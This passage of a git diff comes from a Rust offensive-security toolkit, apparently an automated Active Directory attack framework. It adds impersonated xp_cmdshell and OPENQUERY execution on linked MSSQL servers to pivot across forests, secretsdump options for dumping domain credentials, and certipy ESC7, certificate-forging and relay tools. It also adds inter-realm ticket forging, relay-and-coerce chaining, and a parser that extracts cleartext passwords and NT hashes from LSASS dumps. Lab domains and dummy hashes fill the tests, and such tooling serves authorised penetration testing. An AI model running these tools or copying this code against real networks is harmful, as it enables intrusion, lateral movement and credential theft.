target = required_str(args, "target")?; let username = required_str(args, "username")?; @@ -268,22 +300,28 @@ pub async fn secretsdump_kerberos(args: &Value) -> Result { let ticket_path = required_str(args, "ticket_path")?; let dc_ip = optional_str(args, "dc_ip"); let target_ip = optional_str(args, "target_ip"); + let just_dc_user = optional_str(args, "just_dc_user"); + let use_vss = crate::args::optional_bool(args, "use_vss").unwrap_or(false); let timeout_minutes = optional_i64(args, "timeout_minutes").unwrap_or(3); let timeout_secs = (timeout_minutes * 60) as u64; let target_str = format!("{domain}/{username}@{target}"); let (env_key, env_val) = credentials::kerberos_env(ticket_path); - CommandBuilder::new("impacket-secretsdump") + let mut cmd = CommandBuilder::new("impacket-secretsdump") .arg("-k") .arg("-no-pass") .arg(&target_str) .flag_opt("-dc-ip", dc_ip) .flag_opt("-target-ip", target_ip) - .env(env_key, env_val) - .timeout_secs(timeout_secs) - .execute() - .await + .flag_opt("-just-dc-user", just_dc_user) + .env(env_key, env_val); + + if use_vss { + cmd = cmd.arg("-use-vss"); + } + + cmd.timeout_secs(timeout_secs).execute().await } #[cfg(test)] @@ -292,6 +330,8 @@ mod tests { use crate::credentials; use serde_json::json; + // --- psexec --- + #[test] fn psexec_requires_target() { let args = json!({"username": "admin"}); @@ -358,6 +398,8 @@ mod tests { assert_eq!(extra_args, vec!["-hashes", ":aabbccdd"]); } + // --- psexec_kerberos --- + #[test] fn psexec_kerberos_target_format() { let args = json!({ @@ -432,6 +474,8 @@ mod tests { assert_eq!(optional_str(&args, "dc_ip"), Some("192.168.58.1")); } + // --- wmiexec --- + #[test] fn wmiexec_requires_target() { let args = json!({"username": "admin"}); @@ -451,6 +495,8 @@ mod tests { assert_eq!(command, "whoami"); } + // --- wmiexec_kerberos --- + #[test] fn wmiexec_kerberos_target_format() { let domain = "contoso.local"; @@ -472,6 +518,8 @@ mod tests { assert_eq!(command, "whoami"); } + // --- smbexec --- + #[test] fn smbexec_requires_target() { let args = json!({"username": "admin"}); @@ -491,6 +539,8 @@ mod tests { assert_eq!(command, "whoami"); } + // --- smbexec_kerberos --- + #[test] fn smbexec_kerberos_target_format() { let domain = "north.contoso.local"; @@ -503,6 +553,8 @@ mod tests { ); } + // --- evil_winrm --- + #[test] fn evil_winrm_default_command() { let args = json!({"target": "192.168.58.1", "username": "admin"}); @@ -571,6 +623,8 @@ mod tests { assert!(used_flag.is_empty()); } + // --- xfreerdp --- + #[test] fn xfreerdp_target_format() { let target = "192.168.58.1"; @@ -621,6 +675,8 @@ mod tests { assert_eq!(auth_arg, "/pth:aabbccdd"); } + // --- ssh_with_password --- + #[test] fn ssh_user_host_format() { let username = "root"; @@ -667,6 +723,8 @@ mod tests { assert!(optional_str(&args, "port").is_none()); } + // --- secretsdump_kerberos --- + #[test] fn secretsdump_kerberos_target_format() { let domain = "contoso.local"; @@ -725,6 +783,8 @@ mod tests { assert!(required_str(&args, "ticket_path").is_err()); } + // --- mock executor tests --- + use crate::executor::mock; #[tokio::test] diff --git a/ares-tools/src/lateral/kerberos.rs b/ares-tools/src/lateral/kerberos.rs index 5b042ea7..7a1cc884 100644 --- a/ares-tools/src/lateral/kerberos.rs +++ b/ares-tools/src/lateral/kerberos.rs @@ -123,6 +123,8 @@ mod tests { assert!(optional_str(&args, "dc_ip").is_none()); } + // --- mock executor tests --- + use crate::executor::mock; #[tokio::test] diff --git a/ares-tools/src/lateral/mssql.rs b/ares-tools/src/lateral/mssql.rs index bc6a9113..9f8e0bb6 100644 --- a/ares-tools/src/lateral/mssql.rs +++ b/ares-tools/src/lateral/mssql.rs @@ -98,15 +98,32 @@ pub async fn mssql_enum_linked_servers(args: &Value) -> Result { mssql_query(mssql_from_args(args)?, "EXEC sp_linkedservers;").await } +/// Wrap `inner_query` in a source-side `EXECUTE AS LOGIN` if requested. +/// +/// Cross-forest linked-server hops fail when the connecting principal can't +/// double-hop (Kerberos delegation/SID filtering). Two source-side workarounds: +/// - `EXECUTE AS LOGIN = 'sa'; ` — runs the hop under sa's mapped login +/// (requires SeImpersonatePrivilege or IMPERSONATE on the target login) +/// - `SELECT * FROM OPENQUERY(...)` — uses the linked-server's configured +/// `sp_addlinkedsrvlogin` mapping (separate path: see `mssql_openquery`) +fn wrap_execute_as(inner_query: &str, impersonate_user: Option<&str>) -> String { + match impersonate_user { + Some(user) => format!("EXECUTE AS LOGIN = '{user}'; {inner_query}"), + None => inner_query.to_string(), + } +} + /// Execute a query on a linked MSSQL server. /// /// Required args: `target`, `username`, `linked_server`, `query` -/// Optional args: `password`, `domain`, `windows_auth` +/// Optional args: `password`, `domain`, `windows_auth`, `impersonate_user` pub async fn mssql_exec_linked(args: &Value) -> Result { let linked_server = required_str(args, "linked_server")?; let query = required_str(args, "query")?; + let impersonate_user = optional_str(args, "impersonate_user"); - let full_query = format!("EXEC ('{query}') AT [{linked_server}];"); + let hop = format!("EXEC ('{query}') AT [{linked_server}];"); + let full_query = wrap_execute_as(&hop, impersonate_user); mssql_query(mssql_from_args(args)?, &full_query).await } @@ -114,14 +131,16 @@ pub async fn mssql_exec_linked(args: &Value) -> Result { /// Enable xp_cmdshell on a linked MSSQL server. /// /// Required args: `target`, `username`, `linked_server` -/// Optional args: `password`, `domain`, `windows_auth` +/// Optional args: `password`, `domain`, `windows_auth`, `impersonate_user` pub async fn mssql_linked_enable_xpcmdshell(args: &Value) -> Result { let linked_server = required_str(args, "linked_server")?; + let impersonate_user = optional_str(args, "impersonate_user"); - let full_query = format!( + let hop = format!( "EXEC ('sp_configure ''show advanced options'', 1; RECONFIGURE; \ EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [{linked_server}];" ); + let full_query = wrap_execute_as(&hop, impersonate_user); mssql_query(mssql_from_args(args)?, &full_query).await } @@ -129,12 +148,35 @@ pub async fn mssql_linked_enable_xpcmdshell(args: &Value) -> Result /// Execute a command via xp_cmdshell on a linked MSSQL server. /// /// Required args: `target`, `username`, `linked_server`, `command` -/// Optional args: `password`, `domain`, `windows_auth` +/// Optional args: `password`, `domain`, `windows_auth`, `impersonate_user` pub async fn mssql_linked_xpcmdshell(args: &Value) -> Result { let linked_server = required_str(args, "linked_server")?; let command = required_str(args, "command")?; + let impersonate_user = optional_str(args, "impersonate_user"); + + let hop = format!("EXEC ('xp_cmdshell ''{command}''') AT [{linked_server}];"); + let full_query = wrap_execute_as(&hop, impersonate_user); + + mssql_query(mssql_from_args(args)?, &full_query).await +} - let full_query = format!("EXEC ('xp_cmdshell ''{command}''') AT [{linked_server}];"); +/// Query a linked MSSQL server via OPENQUERY using the linked server's +/// configured remote login (sp_addlinkedsrvlogin) — bypasses Kerberos +/// double-hop. This is the cross-forest pivot path when the connecting +/// principal cannot delegate but the linked server has an explicit login +/// mapping (e.g. `RPC OUT = ON` plus a stored credential). +/// +/// Required args: `target`, `username`, `linked_server`, `query` +/// Optional args: `password`, `domain`, `windows_auth`, `impersonate_user` +pub async fn mssql_openquery(args: &Value) -> Result { + let linked_server = required_str(args, "linked_server")?; + let query = required_str(args, "query")?; + let impersonate_user = optional_str(args, "impersonate_user"); + + // OPENQUERY's inner string uses single quotes; double any embedded ones. + let escaped = query.replace('\'', "''"); + let openq = format!("SELECT * FROM OPENQUERY([{linked_server}], '{escaped}');"); + let full_query = wrap_execute_as(&openq, impersonate_user); mssql_query(mssql_from_args(args)?, &full_query).await } @@ -157,6 +199,8 @@ mod tests { use crate::credentials; use serde_json::json; + // --- mssql_from_args required fields --- + #[test] fn mssql_requires_target() { let args = json!({"username": "sa"}); @@ -187,6 +231,8 @@ mod tests { assert!(windows_auth); } + // --- mssql_base auth string via impacket_target --- + #[test] fn mssql_auth_string_with_domain_and_password() { let auth_str = @@ -206,12 +252,16 @@ mod tests { assert_eq!(auth_str, "CONTOSO/sa@192.168.58.1"); } + // --- mssql_command --- + #[test] fn mssql_command_requires_command() { let args = json!({"target": "192.168.58.1", "username": "sa"}); assert!(required_str(&args, "command").is_err()); } + // --- mssql_enable_xp_cmdshell --- + #[test] fn enable_xp_cmdshell_impersonate_query_format() { let user = "sa"; @@ -240,6 +290,8 @@ mod tests { assert!(!query.starts_with("EXECUTE AS LOGIN")); } + // --- mssql_impersonate --- + #[test] fn impersonate_query_format() { let impersonate_user = "sa"; @@ -268,6 +320,8 @@ mod tests { assert!(required_str(&args, "query").is_err()); } + // --- mssql_exec_linked --- + #[test] fn linked_server_query_format() { let linked_server = "SQL02"; @@ -296,6 +350,8 @@ mod tests { assert!(required_str(&args, "query").is_err()); } + // --- mssql_linked_enable_xpcmdshell --- + #[test] fn linked_enable_xpcmdshell_format() { let linked_server = "SQL02"; @@ -307,6 +363,8 @@ mod tests { assert!(full_query.contains("xp_cmdshell")); } + // --- mssql_linked_xpcmdshell --- + #[test] fn linked_xpcmdshell_format() { let linked_server = "SQL02"; @@ -325,6 +383,8 @@ mod tests { assert!(required_str(&args, "command").is_err()); } + // --- mssql_ntlm_coerce --- + #[test] fn ntlm_coerce_xp_dirtree_format() { let listener_ip = "192.168.58.5"; @@ -344,6 +404,8 @@ mod tests { assert!(required_str(&args, "listener_ip").is_err()); } + // --- mock executor tests --- + use crate::executor::mock; #[tokio::test] diff --git a/ares-tools/src/lateral/pth.rs b/ares-tools/src/lateral/pth.rs index 1d251bd3..0a89a787 100644 --- a/ares-tools/src/lateral/pth.rs +++ b/ares-tools/src/lateral/pth.rs @@ -110,6 +110,8 @@ mod tests { use crate::args::{optional_str, required_str}; use serde_json::json; + // --- pth_cred_string --- + #[test] fn cred_string_with_domain() { let result = pth_cred_string(Some("CONTOSO"), "admin", "aabbccdd"); @@ -128,6 +130,8 @@ mod tests { assert_eq!(result, "admin%aabbccdd"); } + // --- pth_winexe --- + #[test] fn pth_winexe_requires_target() { let args = json!({"username": "admin", "hash": "aabbccdd"}); @@ -159,6 +163,8 @@ mod tests { assert_eq!(format!("//{target}"), "//192.168.58.1"); } + // --- pth_smbclient --- + #[test] fn pth_smbclient_default_share() { let args = json!({"target": "192.168.58.1", "username": "admin", "hash": "aa"}); @@ -192,6 +198,8 @@ mod tests { assert_eq!(format!("//{target}/{share}"), "//192.168.58.1/C$"); } + // --- pth_rpcclient --- + #[test] fn pth_rpcclient_default_command() { let args = json!({"target": "192.168.58.1", "username": "admin", "hash": "aa"}); @@ -199,6 +207,8 @@ mod tests { assert_eq!(command, "getusername"); } + // --- pth_wmic --- + #[test] fn pth_wmic_default_query() { let args = json!({"target": "192.168.58.1", "username": "admin", "hash": "aa"}); @@ -239,6 +249,8 @@ mod tests { assert_eq!(cred, "CONTOSO/admin%aad3b435:aabbccdd"); } + // --- mock executor tests --- + use crate::executor::mock; #[tokio::test] diff --git a/ares-tools/src/lib.rs b/ares-tools/src/lib.rs index 46f90016..52736faf 100644 --- a/ares-tools/src/lib.rs +++ b/ares-tools/src/lib.rs @@ -9,6 +9,7 @@ pub mod args; #[cfg(feature = "blue")] pub mod blue; pub mod coercion; +pub mod concurrency; pub mod cracker; pub mod credential_access; pub mod credentials; @@ -64,7 +65,24 @@ impl ToolOutput { /// Dispatch a tool call by name, executing the corresponding CLI command. /// /// Returns the tool output or an error if the tool is unknown or execution fails. +/// +/// Validates that no credential argument carries a placeholder value before +/// dispatching — a defense-in-depth backstop for the worker credential +/// resolver that catches anything missed upstream (schema strip, prompt +/// sanitization, worker resolver). See [`credentials::validate_arguments`]. pub async fn dispatch(tool_name: &str, arguments: &Value) -> Result { + credentials::validate_arguments(tool_name, arguments)?; + + // Cap concurrent spider_plus dispatches process-wide to prevent the + // netexec fork-storm OOM observed on EC2 (bug_orch_oom_spider_plus.md). + // The permit is held for the duration of the tool execution and dropped + // when this function returns. + let _spider_permit = if concurrency::is_spider_plus_tool(tool_name) { + Some(concurrency::acquire_spider_plus_permit().await) + } else { + None + }; + match tool_name { // ── Reconnaissance ────────────────────────────────────────── "nmap_scan" => recon::nmap_scan(arguments).await, @@ -83,6 +101,7 @@ pub async fn dispatch(tool_name: &str, arguments: &Value) -> Result "adidnsdump" => recon::adidnsdump(arguments).await, "save_users_to_file" => recon::save_users_to_file(arguments).await, "smbclient_kerberos_shares" => recon::smbclient_kerberos_shares(arguments).await, + "ldap_acl_enumeration" => recon::ldap_acl_enumeration(arguments).await, // ── Credential Access ─────────────────────────────────────── "kerberoast" => credential_access::kerberoast(arguments).await, @@ -92,6 +111,7 @@ pub async fn dispatch(tool_name: &str, arguments: &Value) -> Result } "secretsdump" => credential_access::secretsdump(arguments).await, "lsassy" => credential_access::lsassy(arguments).await, + "smb_login_check" => credential_access::smb_login_check(arguments).await, "domain_admin_checker" => credential_access::domain_admin_checker(arguments).await, "gpp_password_finder" => credential_access::gpp_password_finder(arguments).await, "sysvol_script_search" => credential_access::sysvol_script_search(arguments).await, @@ -135,6 +155,7 @@ pub async fn dispatch(tool_name: &str, arguments: &Value) -> Result lateral::mssql_linked_enable_xpcmdshell(arguments).await } "mssql_linked_xpcmdshell" => lateral::mssql_linked_xpcmdshell(arguments).await, + "mssql_openquery" => lateral::mssql_openquery(arguments).await, "mssql_ntlm_coerce" => lateral::mssql_ntlm_coerce(arguments).await, // ── Privilege Escalation ──────────────────────────────────── @@ -144,6 +165,11 @@ pub async fn dispatch(tool_name: &str, arguments: &Value) -> Result "certipy_shadow" => privesc::certipy_shadow(arguments).await, "certipy_template_esc4" => privesc::certipy_template_esc4(arguments).await, "certipy_esc4_full_chain" => privesc::certipy_esc4_full_chain(arguments).await, + "certipy_ca" => privesc::certipy_ca(arguments).await, + "certipy_forge" => privesc::certipy_forge(arguments).await, + "certipy_retrieve" => privesc::certipy_retrieve(arguments).await, + "certipy_esc7_full_chain" => privesc::certipy_esc7_full_chain(arguments).await, + "certipy_relay" => privesc::certipy_relay(arguments).await, "find_delegation" => privesc::find_delegation(arguments).await, "s4u_attack" => privesc::s4u_attack(arguments).await, "generate_golden_ticket" => privesc::generate_golden_ticket(arguments).await, @@ -154,6 +180,7 @@ pub async fn dispatch(tool_name: &str, arguments: &Value) -> Result "raise_child" => privesc::raise_child(arguments).await, "extract_trust_key" => privesc::extract_trust_key(arguments).await, "create_inter_realm_ticket" => privesc::create_inter_realm_ticket(arguments).await, + "forge_inter_realm_and_dump" => privesc::forge_inter_realm_and_dump(arguments).await, "get_sid" => privesc::get_sid(arguments).await, "dnstool" => privesc::dnstool(arguments).await, "gmsa_dump_passwords" => privesc::gmsa_dump_passwords(arguments).await, @@ -187,6 +214,7 @@ pub async fn dispatch(tool_name: &str, arguments: &Value) -> Result "ntlmrelayx_to_adcs" => coercion::ntlmrelayx_to_adcs(arguments).await, "ntlmrelayx_to_smb" => coercion::ntlmrelayx_to_smb(arguments).await, "ntlmrelayx_multirelay" => coercion::ntlmrelayx_multirelay(arguments).await, + "relay_and_coerce" => coercion::relay_and_coerce(arguments).await, _ => Err(anyhow::anyhow!("unknown tool: {tool_name}")), } diff --git a/ares-tools/src/parsers/certipy.rs b/ares-tools/src/parsers/certipy.rs index 724f8e90..80f1ab0b 100644 --- a/ares-tools/src/parsers/certipy.rs +++ b/ares-tools/src/parsers/certipy.rs @@ -9,11 +9,22 @@ const ESC_TYPES: &[&str] = &[ ]; pub fn parse_certipy_find(output: &str, params: &Value) -> Vec { - let target_ip = params - .get("target") - .or_else(|| params.get("target_ip")) + // ca_host_ip is the ADCS CA server IP (where certs are enrolled). + // target/target_ip is the DC IP used for LDAP queries. + // For vuln target, prefer ca_host_ip so exploitation targets the CA, not the DC. + let ca_host_ip = params + .get("ca_host_ip") .and_then(|v| v.as_str()) .unwrap_or(""); + let target_ip = if !ca_host_ip.is_empty() { + ca_host_ip + } else { + params + .get("target") + .or_else(|| params.get("target_ip")) + .and_then(|v| v.as_str()) + .unwrap_or("") + }; let domain = params.get("domain").and_then(|v| v.as_str()).unwrap_or(""); @@ -29,18 +40,24 @@ pub fn parse_certipy_find(output: &str, params: &Value) -> Vec { // Strategy 2: Look for "ESCn :" patterns (certipy find -vulnerable output) // These appear as "ESC1 : 'DOMAIN\\Group' can enroll..." for esc_type in ESC_TYPES { + let esc_upper = esc_type.to_uppercase(); let found = if has_vuln_header { - // Standard certipy output with vulnerability section - output_lower.contains(esc_type) + // Use word-boundary-aware matching to avoid false positives + // (e.g. "esc1" matching inside "esc13" or "esc15"). + // Certipy outputs "ESCn :" or "ESCn:" patterns. + output.contains(&format!("{esc_upper} :")) + || output.contains(&format!("{esc_upper}:")) + || output.contains(&format!("{esc_upper} ")) + || esc_word_boundary_match(&output_lower, esc_type) } else { // Also detect ESC patterns without the header — certipy sometimes // outputs vulnerability info inline with template details. // Look for "ESCn" followed by ":" or "vulnerability" on the same or // nearby lines. - let esc_upper = esc_type.to_uppercase(); output.contains(&format!("{esc_upper} :")) || output.contains(&format!("{esc_upper}:")) - || (output_lower.contains(esc_type) && output_lower.contains("vulnerab")) + || (esc_word_boundary_match(&output_lower, esc_type) + && output_lower.contains("vulnerab")) }; if found { @@ -59,6 +76,9 @@ pub fn parse_certipy_find(output: &str, params: &Value) -> Vec { if let Some(ref tmpl) = template_name { details["template_name"] = json!(tmpl); } + if !ca_host_ip.is_empty() { + details["ca_host"] = json!(ca_host_ip); + } vulns.push(json!({ "vuln_id": format!("adcs_{}_{}", esc_type, target_ip), @@ -75,6 +95,23 @@ pub fn parse_certipy_find(output: &str, params: &Value) -> Vec { vulns } +/// Check if `esc_type` (e.g. "esc1") appears as a whole word in `text`. +/// Prevents "esc1" from matching inside "esc13" or "esc15". +fn esc_word_boundary_match(text: &str, esc_type: &str) -> bool { + let mut start = 0; + while let Some(pos) = text[start..].find(esc_type) { + let abs_pos = start + pos; + let end_pos = abs_pos + esc_type.len(); + // Check that the character after the match is not a digit + let after_ok = end_pos >= text.len() || !text.as_bytes()[end_pos].is_ascii_digit(); + if after_ok { + return true; + } + start = abs_pos + 1; + } + false +} + /// Extract CA name from certipy output. fn extract_ca_name(output: &str) -> Option { for line in output.lines() { @@ -117,12 +154,14 @@ fn extract_template_for_esc(output: &str, esc_type: &str) -> Option { /// Priority for ESC types (lower = more urgent). fn esc_priority(esc_type: &str) -> i32 { match esc_type { - "esc1" | "esc6" => 1, // Direct enrollment → DA cert - "esc4" | "esc8" => 2, // Template abuse / relay - "esc2" | "esc3" => 3, // Certificate agent - "esc7" | "esc9" => 4, // ManageCA / UPN spoof - "esc5" => 5, // Golden cert (requires CA compromise first) - _ => 6, // ESC10-15 and unknown + "esc1" | "esc6" => 1, // Direct enrollment → DA cert + "esc4" | "esc8" => 2, // Template abuse / relay + "esc2" | "esc3" | "esc15" => 3, // Certificate agent / app policy OID + "esc7" | "esc9" | "esc10" => 4, // ManageCA / UPN spoof / weak mapping + "esc11" => 4, // RPC relay (needs coercion) + "esc5" => 5, // Golden cert (requires CA compromise first) + "esc13" => 4, // Issuance policy + _ => 6, // ESC14 and unknown } } @@ -237,12 +276,13 @@ mod tests { assert_eq!(esc_priority("esc8"), 2); assert_eq!(esc_priority("esc2"), 3); assert_eq!(esc_priority("esc3"), 3); + assert_eq!(esc_priority("esc15"), 3); assert_eq!(esc_priority("esc7"), 4); assert_eq!(esc_priority("esc9"), 4); + assert_eq!(esc_priority("esc10"), 4); + assert_eq!(esc_priority("esc11"), 4); + assert_eq!(esc_priority("esc13"), 4); assert_eq!(esc_priority("esc5"), 5); - assert_eq!(esc_priority("esc10"), 6); - assert_eq!(esc_priority("esc11"), 6); - assert_eq!(esc_priority("esc13"), 6); assert_eq!(esc_priority("unknown"), 6); } @@ -338,4 +378,48 @@ mod tests { assert_eq!(vulns.len(), 1); assert_eq!(vulns[0]["vuln_type"], "adcs_esc8"); } + + #[test] + fn parse_certipy_esc13_does_not_false_positive_esc1() { + // ESC13 should not trigger false positive for ESC1 + let output = "[!] Vulnerabilities\nESC13 : Issuance Policy linked to group"; + let params = json!({"target": "192.168.58.10"}); + let vulns = parse_certipy_find(output, ¶ms); + assert_eq!(vulns.len(), 1); + assert_eq!(vulns[0]["vuln_type"], "adcs_esc13"); + } + + #[test] + fn parse_certipy_ca_host_ip_used_as_target() { + let output = "[!] Vulnerabilities\nESC1 : enrollee supplies subject"; + let params = json!({ + "target_ip": "192.168.58.10", // DC IP + "ca_host_ip": "192.168.58.50", // CA IP + "domain": "contoso.local" + }); + let vulns = parse_certipy_find(output, ¶ms); + assert_eq!(vulns.len(), 1); + // Should use ca_host_ip, not target_ip + assert_eq!(vulns[0]["target"], "192.168.58.50"); + assert_eq!(vulns[0]["vuln_id"], "adcs_esc1_192.168.58.50"); + assert_eq!(vulns[0]["details"]["ca_host"], "192.168.58.50"); + } + + #[test] + fn esc_word_boundary_match_basic() { + assert!(super::esc_word_boundary_match("esc1 : vulnerable", "esc1")); + assert!(super::esc_word_boundary_match("esc1:", "esc1")); + assert!(!super::esc_word_boundary_match( + "esc13 : vulnerable", + "esc1" + )); + assert!(!super::esc_word_boundary_match( + "esc15 : vulnerable", + "esc1" + )); + assert!(super::esc_word_boundary_match( + "esc13 : vulnerable", + "esc13" + )); + } } diff --git a/ares-tools/src/parsers/cracker.rs b/ares-tools/src/parsers/cracker.rs index 728b41db..d57ea87f 100644 --- a/ares-tools/src/parsers/cracker.rs +++ b/ares-tools/src/parsers/cracker.rs @@ -285,7 +285,7 @@ $krb5asrep$23$michelle@FABRIKAM.LOCAL:8a7a0b3264590ef6:fr3edom fn john_show_tgs_unknown_user() { // John --show for TGS shows ?:password (can't determine username) let output = "--- john --show ---\n\ - ?:iknownothing\n\n\ + ?:P@ssw0rd!\n\n\ 1 password hash cracked, 0 left\n"; let params = json!({ "hash_value": "$krb5tgs$23$*john.smith$CHILD.CONTOSO.LOCAL$CIFS/filesvr01*$abcdef$123456" @@ -293,7 +293,7 @@ $krb5asrep$23$michelle@FABRIKAM.LOCAL:8a7a0b3264590ef6:fr3edom let creds = parse_cracker_output(output, ¶ms); assert_eq!(creds.len(), 1); assert_eq!(creds[0]["username"], "john.smith"); - assert_eq!(creds[0]["password"], "iknownothing"); + assert_eq!(creds[0]["password"], "P@ssw0rd!"); assert_eq!(creds[0]["domain"], "CHILD.CONTOSO.LOCAL"); assert_eq!(creds[0]["source"], "cracked:john"); } @@ -302,7 +302,7 @@ $krb5asrep$23$michelle@FABRIKAM.LOCAL:8a7a0b3264590ef6:fr3edom fn john_show_tgs_unknown_user_no_hash_param() { // Without hash_value param, ?:password is skipped let output = "--- john --show ---\n\ - ?:iknownothing\n\n\ + ?:P@ssw0rd!\n\n\ 1 password hash cracked, 0 left\n"; let params = json!({"domain": "contoso.local"}); let creds = parse_cracker_output(output, ¶ms); diff --git a/ares-tools/src/parsers/credential_tools.rs b/ares-tools/src/parsers/credential_tools.rs index 3a0d7d60..76099f80 100644 --- a/ares-tools/src/parsers/credential_tools.rs +++ b/ares-tools/src/parsers/credential_tools.rs @@ -7,13 +7,43 @@ use std::sync::LazyLock; // ── Lsassy ────────────────────────────────────────────────────────────────── +/// Real ANSI escape sequences (e.g. `\x1b[1;33m`). +static ANSI_ESC_RE: LazyLock = + LazyLock::new(|| Regex::new(r"\x1b\[[0-9;]*[a-zA-Z]").expect("ansi esc regex")); + +/// Bare-text ANSI leftovers when ESC bytes are stripped during transport. +/// Matches things like `[1;33m`, `[0m`, `[32m` — but NOT arbitrary bracketed +/// text like `[LSASSY]` or `[NT]`. +static ANSI_BARE_RE: LazyLock = + LazyLock::new(|| Regex::new(r"\[\d+(?:;\d+)*m").expect("ansi bare regex")); + +/// Match the first plausibly-clean `DOMAIN\username` token in a line. +/// +/// Domain: starts with alphanumeric, allows alphanumerics/`._-`, no spaces or +/// brackets — keeps us from sucking up `"SMB 192.168.58.10 445 DC01 [+] contoso.local"` +/// as the "domain" when the real domain prefix appears later in the line. +/// +/// Captures: 1=domain, 2=username, 3=remainder of line. +static LSASSY_DOMAIN_USER_RE: LazyLock = LazyLock::new(|| { + Regex::new(r"(?:^|[\s\]\)>])([A-Za-z0-9][A-Za-z0-9._-]*)\\([A-Za-z0-9._$@-]+)(.*)$") + .expect("lsassy domain\\user regex") +}); + +/// Match `[NT] ` (with optional `[SHA1] ` suffix) in lsassy output. +/// Captures: 1=NT hash (32 hex chars). +static LSASSY_NT_HASH_RE: LazyLock = + LazyLock::new(|| Regex::new(r"\[NT\]\s+([0-9a-fA-F]{32})\b").expect("lsassy NT hash regex")); + /// Parse lsassy output for cleartext credentials and NTLM hashes. /// -/// Lsassy dumps credentials from LSASS memory: +/// Handles several output flavors: /// ```text -/// CONTOSO\alice.johnson Password123 -/// CONTOSO\bob.smith 31d6...hash... +/// CONTOSO\alice Password123 +/// CONTOSO\bob aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 +/// SMB 192.168.58.10 445 DC01 [LSASSY] CONTOSO\carol [NT] 31d6... [SHA1] f9e3... /// ``` +/// ANSI color codes (real ESC sequences and bare-text leftovers like `[1;33m`) +/// are stripped before parsing. pub fn parse_lsassy(output: &str, params: &Value) -> (Vec, Vec) { let default_domain = params.get("domain").and_then(|v| v.as_str()).unwrap_or(""); @@ -21,19 +51,15 @@ pub fn parse_lsassy(output: &str, params: &Value) -> (Vec, Vec) { let mut creds = Vec::new(); for line in output.lines() { + let line = strip_ansi(line.trim()); let line = line.trim(); - // Skip noise lines - if line.is_empty() - || line.starts_with('[') - || line.starts_with("INFO") - || line.starts_with("WARNING") - || line.starts_with("ERROR") - || line.contains("authentication") - { + if line.is_empty() { + continue; + } + if is_lsassy_noise(line) { continue; } - // Try DOMAIN\username:password or DOMAIN\username password if let Some((domain, username, secret)) = parse_lsassy_line(line) { let domain = if domain.is_empty() { default_domain.to_string() @@ -65,35 +91,100 @@ pub fn parse_lsassy(output: &str, params: &Value) -> (Vec, Vec) { (hashes, creds) } +/// Strip ANSI color codes and bare-text leftovers (when ESC bytes were dropped). +fn strip_ansi(s: &str) -> String { + let s = ANSI_ESC_RE.replace_all(s, ""); + ANSI_BARE_RE.replace_all(&s, "").to_string() +} + +/// Identify lines that lsassy emits but contain no credential we can parse. +fn is_lsassy_noise(line: &str) -> bool { + line.starts_with("INFO") + || line.starts_with("WARNING") + || line.starts_with("ERROR") + || line.contains("authentication") + // Lines that are pure status (start with `[`/`(`) and contain no `\` + // can't carry a DOMAIN\user pair — skip them up-front. + || ((line.starts_with('[') || line.starts_with('(')) + && !line.contains('\\')) +} + fn parse_lsassy_line(line: &str) -> Option<(String, String, String)> { - // Format: DOMAIN\username password OR DOMAIN\username:password - if let Some(backslash_pos) = line.find('\\') { - let domain = line[..backslash_pos].trim().to_string(); - let rest = &line[backslash_pos + 1..]; - - // Try splitting on whitespace first (most common lsassy format) - // This must come before colon check because NTLM hashes contain colons - let parts: Vec<&str> = rest.splitn(2, char::is_whitespace).collect(); - if parts.len() == 2 && !parts[1].trim().is_empty() { - let username = parts[0].trim().to_string(); - let secret = parts[1].trim().to_string(); - if !username.is_empty() && !secret.is_empty() { - return Some((domain, username, secret)); + // Special-case `[NT] hash` form first — it's unambiguous and the regex + // anchors are friendlier to a clean DOMAIN\user lookahead. + if let Some(nt_caps) = LSASSY_NT_HASH_RE.captures(line) { + if let Some(caps) = LSASSY_DOMAIN_USER_RE.captures(line) { + let domain = caps.get(1)?.as_str(); + let username = caps.get(2)?.as_str(); + if is_clean_domain(domain) && !username.is_empty() { + return Some(( + domain.to_string(), + username.to_string(), + nt_caps[1].to_string(), + )); } } + } - // Fallback: colon-separated (DOMAIN\username:password) - if let Some(colon_pos) = rest.find(':') { - let username = rest[..colon_pos].trim().to_string(); - let after_colon = rest[colon_pos + 1..].trim().to_string(); - if !username.is_empty() && !after_colon.is_empty() { - return Some((domain, username, after_colon)); - } + // General DOMAIN\user form: parse the first clean DOMAIN\user token, then + // pull a secret out of the remainder. + let caps = LSASSY_DOMAIN_USER_RE.captures(line)?; + let domain = caps.get(1)?.as_str(); + let username = caps.get(2)?.as_str(); + let rest = caps.get(3)?.as_str(); + + if !is_clean_domain(domain) || username.is_empty() { + return None; + } + + // Colon-prefixed (DOMAIN\user:secret) — preserve full LM:NT pair. This is + // a terminal branch: once we see the colon delimiter the secret (or lack + // thereof) is unambiguous, so falling through to the whitespace branch + // below would just re-parse the same `:marker` string as a bare token. + if let Some(stripped) = rest.strip_prefix(':') { + let secret = stripped.trim(); + if secret.is_empty() || is_lsassy_marker(secret) { + return None; } + return Some((domain.to_string(), username.to_string(), secret.to_string())); } + + // Whitespace-separated (DOMAIN\user secret). + let secret = rest.trim(); + if !secret.is_empty() { + // Take only the first whitespace-delimited token to avoid swallowing + // trailing `[SHA1] …` decorations into the password. + let first = secret.split_whitespace().next().unwrap_or(""); + if !first.is_empty() && !is_lsassy_marker(first) { + return Some((domain.to_string(), username.to_string(), first.to_string())); + } + } + None } +/// Recognize lsassy field-marker tokens (e.g. `[PWD]`, `[TGT]`, `[LM]`, +/// `[SHA1]`). These are *labels* lsassy emits when it found a credential +/// of that type but redacted/elided the value — they are not secrets. +/// Storing them as passwords poisoned operation state and caused tools to +/// receive literal `[PWD]`/`[TGT]` strings as auth values. +fn is_lsassy_marker(s: &str) -> bool { + let t = s.trim(); + t.starts_with('[') && t.ends_with(']') && t.len() <= 16 +} + +/// Validate a DOMAIN string looks like an AD domain prefix, not garbage. +fn is_clean_domain(d: &str) -> bool { + !d.is_empty() + && d.len() < 64 + && d.chars() + .all(|c| c.is_ascii_alphanumeric() || c == '.' || c == '-' || c == '_') + && d.chars() + .next() + .map(|c| c.is_ascii_alphanumeric()) + .unwrap_or(false) +} + fn looks_like_ntlm_hash(s: &str) -> bool { // NTLM hash: 32 hex chars, or LM:NT format (32:32) let s = s.trim(); @@ -577,4 +668,106 @@ _msdcs.contoso.local. CNAME dc01.contoso.local."; assert_eq!(creds[0]["username"], "alice"); 